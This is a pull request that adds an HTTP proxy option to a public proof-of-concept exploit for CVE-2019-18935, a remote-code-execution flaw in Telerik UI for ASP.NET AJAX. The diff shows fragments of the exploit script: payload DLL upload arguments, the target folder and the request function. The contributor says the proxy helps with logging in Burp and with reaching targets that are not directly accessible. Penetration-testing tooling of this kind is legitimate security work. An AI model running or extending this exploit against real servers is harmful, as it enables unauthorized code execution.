### PR TITLE
Proxy Support 

### DIFF
--- a/CVE-2019-18935.py
+++ b/CVE-2019-18935.py
@@ -17,6 +17,25 @@ Notes:      - This tool's dependencies are best satisfied when those modules
 Usage:      python3 CVE-2019-18935.py -h
 '''
 
+#!/usr/bin/env python3
+
+'''
+Author:     @noperator
+Purpose:    Proof-of-concept exploit for CVE-2019-18935, a .NET JSON
+            deserialization vulnerability in Telerik UI for ASP.NET AJAX
+            allowing remote code execution.
+Notes:      - This tool's dependencies are best satisfied when those modules
+              are installed within a virtual environment.
+            - You'll need Visual Studio installed to compile mixed-mode .NET
+              assembly DLL payloads using build-dll.bat.
+            - Usage of this tool for attacking targets without prior mutual
+              consent is illegal. It is the end user's responsibility to obey
+              all applicable local, state, and federal laws. Developers assume
+              no liability and are not responsible for any misuse or damage
+              caused by this program.
+Usage:      python3 CVE-2019-18935.py -h
+'''
+
 from argparse import ArgumentParser
 from json import dumps, loads
 from os.path import basename, splitext
@@ -34,6 +53,7 @@ from RAU_crypto import RAUCipher
 
 disable_warnings(category=InsecureRequestWarning)
 
+
 def send_request(url, files):
     headers = {
         'User-Agent':                'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
@@ -42,7 +62,7 @@ def send_request(url, files):
         'Accept':                    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Upgrade-Insecure-Requests': '1',
     }
-    response = post(url, files=files, headers=headers, verify=False)
+    response = post(url, files=files, headers=headers, verify=False, proxies=proxies)
     try:
         result = loads(response.text)
         result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
@@ -175,10 +195,17 @@ if __name__ == '__main__':
     parser.add_argument('-p', dest='payload', help='mixed mode assembly DLL')
     parser.add_argument('-f', dest='folder', default='C:\Windows\Temp', help='destination folder on target')
     parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
+    parser.add_argument("-proxy",action="store",dest="proxy",help="proxy example: -proxy http://127.0.0.1:8080",default=False)
     args = parser.parse_args()
 
     # argparse doesn't handle interdependent arguments well, so we have to do
     # that here, unfortunately.
+
+    # proxy support
+    proxies = { 
+              "http"  : args.proxy, 
+              "https" : args.proxy
+            }
 
     # If only deserializing, then must provide a remote payload name OR an SMB
     # server.


### PR DESCRIPTION
Had to keep adding proxy support when pulling down so might as well try to get it in master .  I use it for documenting the attempt  time and response in Burp/seeing status codes/troubleshooting.  Also needed it when target was not directly accessible. 

Feel free to delete any extraneous spaces etc, sorry. 